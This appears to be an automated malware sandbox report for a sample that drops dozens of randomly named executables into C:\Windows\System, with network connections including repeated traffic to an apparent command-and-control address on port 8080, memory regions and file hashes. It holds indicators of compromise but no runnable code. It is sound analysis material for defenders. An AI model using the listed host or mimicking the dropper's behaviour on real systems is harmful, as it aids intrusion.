C:\Windows\System\AJnUmgV.exe

C:\Windows\System\AJnUmgV.exe

C:\Windows\System\kdLYPSM.exe

C:\Windows\System\kdLYPSM.exe

C:\Windows\System\wgtUUEW.exe

C:\Windows\System\wgtUUEW.exe

C:\Windows\System\TEoNfks.exe

C:\Windows\System\TEoNfks.exe

C:\Windows\System\ilQtFvy.exe

C:\Windows\System\ilQtFvy.exe

C:\Windows\System\bjCqVWP.exe

C:\Windows\System\bjCqVWP.exe

C:\Windows\System\EYdQkHj.exe

C:\Windows\System\EYdQkHj.exe

C:\Windows\System\kNNWZaa.exe

C:\Windows\System\kNNWZaa.exe

C:\Windows\System\AoRivRx.exe

C:\Windows\System\AoRivRx.exe

C:\Windows\System\wlFqMCy.exe

C:\Windows\System\wlFqMCy.exe

C:\Windows\System\LfFKhIJ.exe

C:\Windows\System\LfFKhIJ.exe

C:\Windows\System\cAGfmqO.exe

C:\Windows\System\cAGfmqO.exe

C:\Windows\System\UWDUUjw.exe

C:\Windows\System\UWDUUjw.exe

C:\Windows\System\UUpjBmT.exe

C:\Windows\System\UUpjBmT.exe

C:\Windows\System\cZGNFAn.exe

C:\Windows\System\cZGNFAn.exe

C:\Windows\System\GZSiKAn.exe

C:\Windows\System\GZSiKAn.exe

C:\Windows\System\gbqtlJi.exe

C:\Windows\System\gbqtlJi.exe

C:\Windows\System\swoaplv.exe

C:\Windows\System\swoaplv.exe

C:\Windows\System\TxxTQBp.exe

C:\Windows\System\TxxTQBp.exe

C:\Windows\System\tdsQlzk.exe

C:\Windows\System\tdsQlzk.exe

C:\Windows\System\oRRanLs.exe

C:\Windows\System\oRRanLs.exe

C:\Windows\System\PuIQcQY.exe

C:\Windows\System\PuIQcQY.exe

C:\Windows\System\EtQLtng.exe

C:\Windows\System\EtQLtng.exe

C:\Windows\System\nfZGPxO.exe

C:\Windows\System\nfZGPxO.exe

C:\Windows\System\bucjWDx.exe

C:\Windows\System\bucjWDx.exe

C:\Windows\System\wvkSejT.exe

C:\Windows\System\wvkSejT.exe

C:\Windows\System\GpqfPMB.exe

C:\Windows\System\GpqfPMB.exe

C:\Windows\System\NmVfcEg.exe

C:\Windows\System\NmVfcEg.exe

C:\Windows\System\PHTTbVs.exe

C:\Windows\System\PHTTbVs.exe

C:\Windows\System\dFYmqbt.exe

C:\Windows\System\dFYmqbt.exe

C:\Windows\System\bCJzoRY.exe

C:\Windows\System\bCJzoRY.exe

C:\Windows\System\gwFHeIW.exe

C:\Windows\System\gwFHeIW.exe

C:\Windows\System\lxKTrbZ.exe

C:\Windows\System\lxKTrbZ.exe

C:\Windows\System\YJmEdCs.exe

C:\Windows\System\YJmEdCs.exe

C:\Windows\System\zRPcNgQ.exe

C:\Windows\System\zRPcNgQ.exe

C:\Windows\System\muqZSYK.exe

C:\Windows\System\muqZSYK.exe

C:\Windows\System\NHlpnpP.exe

C:\Windows\System\NHlpnpP.exe

C:\Windows\System\RLvMidO.exe

C:\Windows\System\RLvMidO.exe

C:\Windows\System\zmmjnmj.exe

C:\Windows\System\zmmjnmj.exe

C:\Windows\System\TNiFAps.exe

C:\Windows\System\TNiFAps.exe

C:\Windows\System\EYkmGLV.exe

C:\Windows\System\EYkmGLV.exe

C:\Windows\System\tgPvJCh.exe

C:\Windows\System\tgPvJCh.exe

C:\Windows\System\kqjZOva.exe

C:\Windows\System\kqjZOva.exe

C:\Windows\System\eRwTcMB.exe

C:\Windows\System\eRwTcMB.exe

C:\Windows\System\pDVYiea.exe

C:\Windows\System\pDVYiea.exe

C:\Windows\System\KmeuyJo.exe

C:\Windows\System\KmeuyJo.exe

C:\Windows\System\QHkZEIE.exe

C:\Windows\System\QHkZEIE.exe

C:\Windows\System\LpXrVhF.exe

C:\Windows\System\LpXrVhF.exe

C:\Windows\System\xJBXpMU.exe

C:\Windows\System\xJBXpMU.exe

C:\Windows\System\dWiEVzl.exe

C:\Windows\System\dWiEVzl.exe

C:\Windows\System\uqktyHD.exe

C:\Windows\System\uqktyHD.exe

C:\Windows\System\fFTbeMF.exe

C:\Windows\System\fFTbeMF.exe

C:\Windows\System\yUxSsWb.exe

C:\Windows\System\yUxSsWb.exe

C:\Windows\System\zvPjnmo.exe

C:\Windows\System\zvPjnmo.exe

C:\Windows\System\mWEAayF.exe

C:\Windows\System\mWEAayF.exe

C:\Windows\System\vASlgeV.exe

C:\Windows\System\vASlgeV.exe

C:\Windows\System\psFDXTa.exe

C:\Windows\System\psFDXTa.exe

C:\Windows\System\Vxkpgdp.exe

C:\Windows\System\Vxkpgdp.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
NL 23.62.61.155:443 www.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp

Files

memory/3096-0-0x00007FF632390000-0x00007FF632786000-memory.dmp

memory/3096-1-0x000001629FB00000-0x000001629FB10000-memory.dmp

C:\Windows\System\axVNZQz.exe

MD5 757f411fecb96f87e8f04bb82f2fa8d1
SHA1 ed7ae496fd85f9ccc12f72809686217746b59d0f
SHA256 d295b8f1b75770f67069c0ddccbda1f9f0a5a407363f4309d19f4aaf9b560d25
SHA512 59c99126e20f0caa09f50732fa0338d2beca45184c866b31fab7cdd63cc0de72d323bfb823bd7270326d1c36db7a31bcd1776099e6381d75b7e5a2f757bd3b68

C:\Windows\System\EWdOxVy.exe

MD5 f5ee345af397590609c67e79d32aa71a
SHA1 70c7d4e59641b7916bfa1ef779c10ce317c0030e
SHA256 0f567c570b6efcabbba95a915ac2842f796f919953757b3f37dcd719867c3ca2
SHA512 38907d09f5a04b75a9271ebd12b4575dcb493beb73d9dcbec7752594d7ac29021dc6a3c2caf59781aecfceebfcbeafbcb77f56325ff4a44c48d9f38428038494

memory/4212-16-0x00007FF703F50000-0x00007FF704346000-memory.dmp

C:\Windows\System\IBMKRWO.exe

MD5 53d0cc27d01995a9ab41acab2c2aaecc
SHA1 9244495e6d3c268cbfb71707f2dda260b94e08d2
SHA256 6f34427750c3c3ccc77b90b3aacf02f5b85374275c929434d399921cfafa32a4
SHA512 c7feec26de83eaec13bf0ba1480a40e918b38957ffee8ef31b64bc51cb54dc5f1af07bf95c259877c23e1368c6d9ce294d78efec529f0a2b6471f46a3e40b2b6

C:\Windows\System\urUyRME.exe

MD5 4ed4f9c744d1a067e2e8b3d2db75898f
SHA1 fd4b67c25e629f0831bf759266bba332bccc6dbd
SHA256 38d1730aefe64fab081a4dcd97831ec4861b388ef760279436172cb7ca36ae12
SHA512 0d06ea19aeb3d7ac64d0a305c198e77da53d60cf5e24fe62e15acd95a8527f9d967a96a03758e812416db213a5b0aee7ffd7d811cea885ce9a2f25f6fa3aa7e4

C:\Windows\System\nwWVnrF.exe

MD5 d4d57728c3e98392113919f4bee9a918
SHA1 95debce5bed9e9165c29518ae3d3084eadc4dfb8
SHA256 4b47c3585547baee42e388743adae4aa6ac7a2d3374f9b8d4cf8b1d77cf19ad1
SHA512 c13d911080b2c6e7dfe6699d7f3f1976be53920a99b330f1a9b7a949eac6ebb51d1bd4391076d0978f6eb3b5cc45f377af8659e9cf2036ed44d54e16a36df332

C:\Windows\System\Burqpzn.exe

MD5 555f1ec1bda52c7125cd15c5dc93f589
SHA1 ea2aca5d98fdd09c54facfe1776d3aa36e7ef7b6
SHA256 cd2464026385f64f6f193f13d633294ad5a2d097758c5a9f8ff067a248f504a1
SHA512 0d102891c05d643761a1007ed860f757a1d3e483211ac52a11fd953724dca4c072dd7673b7c0b93ced537ed5c1f4543e5c218476a7cb70caf367676b58714e64

memory/424-89-0x00007FF6358C0000-0x00007FF635CB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_muoqvzlu.or0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2196-119-0x00007FF716EA0000-0x00007FF717296000-memory.dmp

C:\Windows\System\qUtHKyC.exe

MD5 d465c6b992b22a48b7e4e168129e8c04
SHA1 60ce0fb5991a62bb0ac92da0315f39898d5dc5bb
SHA256 27855e9c45bd41e9830280a648aee592ccbc668e4d860493321f7983bcac3233
SHA512 26d22b36d2a124ede88e11ac954e26a36f4c1e2fb9796bb05caa11172fa7724b56e7329421ef5d1f4b55d3e5984c90a0b0436f2ce81d700bfc9d28a584dcf148

memory/3516-127-0x00007FF7397A0000-0x00007FF739B96000-memory.dmp

memory/4000-129-0x00007FF6A5CD0000-0x00007FF6A60C6000-memory.dmp

memory/4964-130-0x00007FF731E90000-0x00007FF732286000-memory.dmp

memory/564-132-0x00007FF7DE280000-0x00007FF7DE676000-memory.dmp

C:\Windows\System\JJjLlUH.exe

MD5 124086b108447fda3ef924f6fe0212d0
SHA1 9d13aefecbe23a5d21a2f12fc6b8cb2213af1d10
SHA256 4f82d7447d58dfc6131f3a1b7bd4a6af4314f3eac6e5a475688b05e8f4cfa218
SHA512 a5d67b9cb9af6c913ddb9a1cd0fac2fcb5fadb34c2bf5fe6b1911c5b440241f88dce6685852e803ea3e82329c7ba5ebcdac3ffb764aa689857fc2e1cc3b17a25

C:\Windows\System\ygtUIca.exe

MD5 a0c1516ce1f734f631eee4cfc53a8296
SHA1 867d3fdc2e2dcaa38051276d053841c70a783d83
SHA256 09fa0a88936ad3cf2a487b90fd4b1450cd443c4afc237f21299dc1ccfa0f2024
SHA512 7f5e8f5dc8bdbf9622f74b264feb38413f74cea814718dc62621d0d985bbf58b161aa00d03406aba3db8bb1452ebe2b0d3bec225124219f3cf464f76809c28a2

C:\Windows\System\nKADzeH.exe

MD5 9337b0a8e904d8f93e99ec3297cf6f42
SHA1 0de6d5277a04e85dbda0c7bd72680b84d90161a3
SHA256 f25fb9894ff607c084c5559657726c74ef690328eec75803274f669e2919fe80
SHA512 fcf01c38bf02727e89134a10ff04e7c536fab764e6c09b93f8ad3a66aa641d07cfa9776c26936d5619fa5561094b6ff947e107ec83c3cc31286bd1f67bf0fb03

C:\Windows\System\SyqIKiE.exe

MD5 abe7bf58536d6caf152bfe70c3717c15
SHA1 5af5359a9cec55d35831485f4616a8ee3214ba56
SHA256 9361d172989ed560aececd1646cb2494a22f3a59e0b078bce514d5019b16f2ff
SHA512 65ee1470e6b2b883e68c190ac99d22d31e0d06f13dcfed4f6590b50aa9feb968e1a5b41a76aad82d1b6e945c851079e7e2c9a90d8e6493e96c208fb33e1de18f

C:\Windows\System\AmtaodT.exe

MD5 2e0b988b929ede19715e6959c1acd8cd
SHA1 bf3a114b80e7952e54a1ee8bf8ec0c80b84d441b
SHA256 892b54d1406bbdabc3a59684fc86c25aa9020d2f4436e8c7970c0682598e14e9
SHA512 fe89b3f61738c1f64460a542fae3f49ed080a69dfac77f78307ca1aa68812608bd2008e03cb2b2377e44f48d46e658718f98636deb92721f648f8b71659737b7

memory/2980-193-0x00007FF67DEF0000-0x00007FF67E2E6000-memory.dmp

memory/2832-196-0x00007FF776C00000-0x00007FF776FF6000-memory.dmp

memory/1932-198-0x00007FF7FBF10000-0x00007FF7FC306000-memory.dmp

memory/1188-197-0x00007FF6778A0000-0x00007FF677C96000-memory.dmp

memory/1792-195-0x00007FF7052E0000-0x00007FF7056D6000-memory.dmp

memory/4656-194-0x00007FF691080000-0x00007FF691476000-memory.dmp

C:\Windows\System\zoOJLVN.exe

MD5 5b4ebd99b4b7d34cbcf6b8485dc7c43f
SHA1 616ae90b03d7f0d559cc0e04803bd073b0473978
SHA256 c3374d7436a91197736ecb3b9bf0777af289276a328b004f21a243877c191779
SHA512 52a36194c3fb89b18b8617e2a18984b38382f9d8744f37b912f3f8b9f74edb787c78efd7045c9f006002035b80064536cb797ea114251511cd854ab3867b3b7e

C:\Windows\System\whoZHnc.exe

MD5 ff3a1293637442abfe1499fc4c5de9c0
SHA1 ab8c8dbb147aa753a8969b657e023d4d16820ec1
SHA256 2007eadfba08cf12601dda181c7271b57467ebc99b3ae7ed030ba354c5736cfc
SHA512 e4d6b2b4edf93c963a64a3b9c812af2a4f4008505b90ddd681158269110198e0220828b92ffa45df400fea49be79589ded9e682b0042310311ee548759c0808c

C:\Windows\System\RLvenfC.exe

MD5 e3b178e63348b876b639dd9da448f9e6
SHA1 be3bfeba296ed7d99c1c930be72a9f9095ad779c
SHA256 3c9f4b2aa1e08801727e30ec64904195d266db5dda714934c94a23f87d6d4c9d
SHA512 e02a0ccad77a4b5292cb12397bb0e0743f3f396e6b56f4bc6073bb18917c87a915b9121ecf71d527df3954027a244903711fdbf46308a06496f239641f903d84

C:\Windows\System\ybHZLWM.exe

MD5 c7e49d02be44b28e209666a23c76b088
SHA1 73fdadfe6017a7b06e93a1b4c5b514836d554725
SHA256 3c1f6eeb79cd08be237ba48f752deb689a3a54c77e8d528286c042805cb85e80
SHA512 18c0cc8f73d43440d4231985f3b79a4688db5187de09267093b089a2e0a13dab096f589bb71167bce85ba85b8805b55498e11695fb2fd3ed07c97e88070ec1b6

memory/3176-180-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp

memory/3176-199-0x000001E3E7430000-0x000001E3E7BD6000-memory.dmp

memory/576-171-0x00007FF7F5730000-0x00007FF7F5B26000-memory.dmp

C:\Windows\System\trEJEmh.exe

MD5 c93ff1d6958f40695642d94e1426b808
SHA1 c5a730e9506d63b78e545d4780c1dbbbd1f11769
SHA256 1acd1baa6e404c6b2a911413170e50c79162b796e0e79548a45f57236adbd73d
SHA512 8b6ba184a39cf43dd2e62ce89c91e2a4de6368930cf468b4ef91102dffa5e7a5075f8e9d765c1a4d231fa6419403f8f2b57486e33bbd2c0b32df0ced00d2862a

memory/884-154-0x00007FF716BB0000-0x00007FF716FA6000-memory.dmp

memory/2184-153-0x00007FF62C600000-0x00007FF62C9F6000-memory.dmp

memory/2948-144-0x00007FF796EA0000-0x00007FF797296000-memory.dmp

C:\Windows\System\ScQKdch.exe

MD5 8e967b90d6a20298428b6c3bfe8048df
SHA1 68844d2006bffcc659b621c22b78190f8ac53e66
SHA256 60f8e4fb18d40ff5ce021132d09eef088fc09573321fcc3d223812b5f2ca41ba
SHA512 49522377bc3831a34ab8abacc715111c36abff3ce61fc9d8cf5a962f704470177f19aee4adf172c32f55aacc8bc7d903916a21bfbc367a206bed543962c2ea6b

memory/236-131-0x00007FF7CB9B0000-0x00007FF7CBDA6000-memory.dmp

memory/1676-128-0x00007FF607410000-0x00007FF607806000-memory.dmp

C:\Windows\System\RdtjIlK.exe

MD5 40d566bac017db3cac07b9311d3cd3c1
SHA1 4996909526dc2041dbf130412b057c4368acbdfc
SHA256 daa4c44eadd6c6beb6d85d0aab8e02a6403db29f59c6710a06b0937e44e9ab82
SHA512 b188d4b34e438787dbe90070bec18754a7a91d09140bee01050369f41fc0642cc3e246ed6eb7786eba836376b40d64d265ed8ea1d7a5e119082a4508376d14c5

C:\Windows\System\TAOyIgC.exe

MD5 b68b72e79bcb51ed67b0609f161e4c3d
SHA1 d5020dfb9642e662efaba8a36194cdc5a6e3d534
SHA256 31d6eb84a3b5a7115c70a69322e0863819aa2263d3b7012676a8fa5a49f7cfeb
SHA512 b3c12a1a4128f115515c6a2a318873097737c76608b6995dc899601fb8ba8f4ef08855cae2e848fa6bbe9e0f323aa75c36840b32d392177c8c8d48bdfa400ded

memory/408-120-0x00007FF79A850000-0x00007FF79AC46000-memory.dmp

memory/4492-118-0x00007FF744BC0000-0x00007FF744FB6000-memory.dmp

C:\Windows\System\RdtjIlK.exe

MD5 696c8154af27418ddcb4553ad34ab702
SHA1 ec796cb597c28374bf10219d8e140df96abcb79b
SHA256 a3f65b9e765e9ef270a1306c6587e46b12f413145e90790d9c61041ca816743e
SHA512 8948f14c6a6a5c2bc1ffcb88a4e58897bd2090b748ccf17aa0c291965611d89cc55f481cc57e4e8133c82dc8079fc58e76ab8b9befce0f054090b12b2e7b03bc

C:\Windows\System\OuNGpZq.exe

MD5 67deac45f365e72a0713b3509f786af2
SHA1 a80b29f12e08cccba6ceb9276f6e0c9ee6f53bc3
SHA256 f92cc4a377ffe7db1e12e7de227987adbcfa57bb4ada75c4e63833e964ad4a64
SHA512 5a6fb6ccc938bc1a8b49f875f46594e198dc33622ddb4061a78ea4456c2c1a89169881a7009b81746d2e549ea707d008141081695074e6d6d96a5487291dd810

C:\Windows\System\ILGXdDw.exe

MD5 c0f5049da5e309570a5bec1b718669db
SHA1 8fbbe12ad0acef1094de0135888d27e28b437f14
SHA256 4a302cc15f01ec5c05836bb6488ce2522154438d928a0e033c093e60cafd6451
SHA512 735b38703ffa6ac1c49111ea12efc684eeab6501132112d4ddbc8045ea4b09b85939135e217a7ae3aa2c081c8a34a74cf6c2456969eb4a10b056eb1e74905af5

C:\Windows\System\XDZxNQE.exe

MD5 a4c65f92ac6e92a62469f68d4adadd6c
SHA1 63238b67c9b23baf59aebafa9ceaf4b3f3ca8d8c
SHA256 45c1a823f29f872f2640ab61eabca7949d688eb4751ca7c2f57e4cf1ebb6f4d4
SHA512 ec751db0b16898ff41ef15052e38e7f9a8afc1c1434ea7d3334a87bebd348622f93df31de179e86e75f4c739b76de5c8308e5a061753b97710cc0accd085fb84

memory/3788-99-0x00007FF775C10000-0x00007FF776006000-memory.dmp

memory/3176-98-0x000001E3E6800000-0x000001E3E6822000-memory.dmp

C:\Windows\System\bLpZMhH.exe

MD5 5410dbf2e1a6c59968c804316ea48bba
SHA1 de760a3856852764aa02f318db95a8b5cd183354
SHA256 13cb07bdd448e1c4acf0babd089ab512f5db63dea1a92d4c86d938f3b4dffe79
SHA512 a232aa928d892ee60d35bccf330a1bd0f8eb0c3ee9dd3ea57902f27a132b87aeb63bd206b54417f5f985a7a7092e28ef7161ddf5a8a052446728c8eda215e13d

memory/3176-83-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp

C:\Windows\System\pyyHgjv.exe

MD5 4f838111fe2c0bd0881639b04db13cf4
SHA1 9f38af039f52c4a173ed0c17691bfa1357b4af23
SHA256 54c4d0e8e47a36d8a00d69279ff1c023d18a994716255796da73a56b9ee432e0
SHA512 a7246d177175736662de39bcd9c6215af9e1e3b8b68a7f4e8ce3832a8fc37681adae637b50e0df7fc7cf2541b8aa102f546665d693d6aca2b32c017bce27c4be

C:\Windows\System\SwCQmTw.exe

MD5 697e664be18f248459750675ec0823cf
SHA1 848b3815ec4c94f7eb137a9bdb5eca262c186814
SHA256 e05b6b998adf8b8a1da1dde428d5765d231c65b79a502b5674dc69d7f5af864d
SHA512 510685fba9647d8ac89d125ad9d7a0e282f6e7a2ce13e8f9c00e8614fe53d06504847f5e3731c10c20ce7cee1f9c9036e5209e52d982d9a267261c9eb1c93633

C:\Windows\System\PpisgNH.exe

MD5 1a73f9902f9e57449a9dbd8d01f39f80
SHA1 bd7782e28b376da53fbcd712109e2b129407a2c3
SHA256 d5f9d0e13d91072511316f83d416017e4c4e6f45a4bb87d310307e61cd1b1b63
SHA512 fa2f1b4e184638056df76a0950a70370be5d156a21c655aa28bbe83837564f3123dd50e3ffeac5514023e76f028c7a232755d4de68d253935aa937f8b4a7e7c8

C:\Windows\System\OwTpFMC.exe

MD5 b30c6cf6f9e769f81535933ddf2c7497
SHA1 808757f40d9e8ebc9f0733f3881a753ac3a66029
SHA256 f9040b37bc571278d0c781fd7f37a8af5bc59db031c3b07e977d9fc939731ce4
SHA512 7401d3e94b85e724bdf70237208a80a3375ef6141bcbc34e3bcefb3a70410e36e58cee6fde99fa3400e9e606c52407528d4427580337d8dc4feade2870b4470a

C:\Windows\System\sOalaow.exe

MD5 a0adef72b8473f4a4d91c6ed1c36953d
SHA1 59d0f067c05aaa37c64b9a9c1e4456cec9275ea9
SHA256 b79ec5771077b1baf3eb4defd8516ae377a303795d1540ca8a4349afefb6cb11
SHA512 c2ff131c3f4bb1bde6eaf47d9acbad228e6726716e201cbd82b37f65a89f0b3ad1490e29700f3bfbfd15d46a277cb04866d8d5be2cc7f2932cf2c0fbbccd465f

C:\Windows\System\qndCowM.exe

MD5 42b896360b04dd1295309933d8f2c56b
SHA1 d802d8023a57527817c2ed6953e13069e8328146
SHA256 2d78215df272f1fde2b682455b87a327818bcdda7c24c428f97858c05f17f15d
SHA512 e8ddb7fa9021a0f8394ab559115f60f4f16cee3e81f42526f91dce80285bd0271db2ef170c2996ccd42384b5f55a92ef7b5728e5fa20adf8f1d1cb39b1caa197

memory/4800-39-0x00007FF72E940000-0x00007FF72ED36000-memory.dmp

C:\Windows\System\aPjGTGe.exe

MD5 4eac20683b3e6107d10b3aaf46f63092
SHA1 22fa0d0d8a2b84fae94e1aea468cb88e2adff787
SHA256 62108aa93d33b51b2a0148d0375952995736f3d6b4cd5379df782a5f80e78506
SHA512 9f73c762d1bf6453f54639065118fccd451ca7dd850e9b3b2518751399bc5ccbb8574cdcb49d5b2f5533c932c86a5cd274e265a5eb62947ff0ee22475d36f3c3

memory/4876-28-0x00007FF6EAC80000-0x00007FF6EB076000-memory.dmp

C:\Windows\System\brHqTLB.exe

MD5 0f9b420901f149036eb52a31feb9c95e
SHA1 11dbca6da39716e3860d021dd9ace6bf755f263c
SHA256 c1695ec3da6bff51a54a36c32afabf0874ce39d3b92e26af99e125cfed29a386
SHA512 c25d2daacba6bb5f7d4ad8c35f790fd9b6f810b0a2f688b55c717ea716a420c5693b573a8a0e4d04d4ca8411743d9762427acdf3e99493ded1d92a56f4024aac

memory/3176-21-0x00007FFBF9313000-0x00007FFBF9315000-memory.dmp

memory/3096-2810-0x00007FF632390000-0x00007FF632786000-memory.dmp

memory/4212-2811-0x00007FF703F50000-0x00007FF704346000-memory.dmp

memory/4876-2813-0x00007FF6EAC80000-0x00007FF6EB076000-memory.dmp

memory/3176-2823-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp

memory/3176-3068-0x00007FFBF9313000-0x00007FFBF9315000-memory.dmp

memory/884-3085-0x00007FF716BB0000-0x00007FF716FA6000-memory.dmp

memory/4212-4417-0x00007FF703F50000-0x00007FF704346000-memory.dmp

memory/4800-4423-0x00007FF72E940000-0x00007FF72ED36000-memory.dmp

memory/4876-4433-0x00007FF6EAC80000-0x00007FF6EB076000-memory.dmp

memory/2980-4442-0x00007FF67DEF0000-0x00007FF67E2E6000-memory.dmp

memory/424-4441-0x00007FF6358C0000-0x00007FF635CB6000-memory.dmp

memory/3788-4444-0x00007FF775C10000-0x00007FF776006000-memory.dmp

memory/4492-4449-0x00007FF744BC0000-0x00007FF744FB6000-memory.dmp

memory/4656-4448-0x00007FF691080000-0x00007FF691476000-memory.dmp

memory/1792-4447-0x00007FF7052E0000-0x00007FF7056D6000-memory.dmp

memory/2196-4446-0x00007FF716EA0000-0x00007FF717296000-memory.dmp

memory/408-4445-0x00007FF79A850000-0x00007FF79AC46000-memory.dmp

memory/1676-4470-0x00007FF607410000-0x00007FF607806000-memory.dmp

memory/4000-4454-0x00007FF6A5CD0000-0x00007FF6A60C6000-memory.dmp

memory/3516-4457-0x00007FF7397A0000-0x00007FF739B96000-memory.dmp

memory/564-4486-0x00007FF7DE280000-0x00007FF7DE676000-memory.dmp

memory/1188-4498-0x00007FF6778A0000-0x00007FF677C96000-memory.dmp

memory/2184-4503-0x00007FF62C600000-0x00007FF62C9F6000-memory.dmp

memory/2948-4495-0x00007FF796EA0000-0x00007FF797296000-memory.dmp

memory/236-4485-0x00007FF7CB9B0000-0x00007FF7CBDA6000-memory.dmp

memory/4964-4482-0x00007FF731E90000-0x00007FF732286000-memory.dmp

memory/576-4527-0x00007FF7F5730000-0x00007FF7F5B26000-memory.dmp

memory/884-4533-0x00007FF716BB0000-0x00007FF716FA6000-memory.dmp

memory/1932-4524-0x00007FF7FBF10000-0x00007FF7FC306000-memory.dmp

memory/2832-4489-0x00007FF776C00000-0x00007FF776FF6000-memory.dmp

C:\Windows\System\uLrCvSq.exe

MD5 6c6a33c852f4e05ffd14cdf0dcab7779
SHA1 70449821f99925d7b8d245181569b7ac4d2ffae8
SHA256 889f3baefc9f46c7632a467db8882ec92f1f0df14da91d5a211e7484de261e45
SHA512 92e5654661ef50c470f84dbec4dcad9efdca5e4026c073f08c798af48c0b5d8107a7b2ff4d63fdb982f371e15d79e95f8a6d716a30b5c5123a7273c49d650d19

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\DGZPR200\microsoftwindows.client[1].xml

MD5 e5d9932ef6c66743d019cbb71c2a27cd
SHA1 56e75c011bc472065f7c43cea7c56a79acce0908
SHA256 8c2ad2e11de6d6d3c8f0326bd75fe2d88af48e5c202d0a74ae9864427ad27310
SHA512 69a88222e87c7820ff0114500bc568accb431f90d12961d4fafc22d908b40dfb5e8e6f01113e3a0d9ee4b6e9e4e87207e052a4eddc53927419840706416c387d

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\DGZPR200\microsoftwindows.client[1].xml

MD5 ac89b27288d6b6bc86bc22cd5c86104b
SHA1 dae16fe4257a4def1c78a14c66291963afb2e688
SHA256 c6caad403040d2fafb03ed14c051e3f7e48e862c6212dd92d6a1c4fbb4e31669
SHA512 cdeefc6449d18d18031300903f8edb8072a3fbe0d63cbc9cd0abc871c9da405f0040ca104f1b1875beb293e03d0b67ff5e7ed546bbd4acfb9ef92fff2a1582fe

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 abe9d32bd71976ac538464650c0780c7
SHA1 f11086bd7eef39b2e831b881b964f2d487069428
SHA256 cacf7c7ce8a3785b7b884650899b931cc225dfe5bf7c9c306efca0f2a874de4c
SHA512 54a9903f59cdcdf7dee413e0fd4b0798e9ab3c0bd06c7dd0cb2040fee43d95065b6540bbab674c81674c181c2786181398384c1d178f026e865c6bef05369728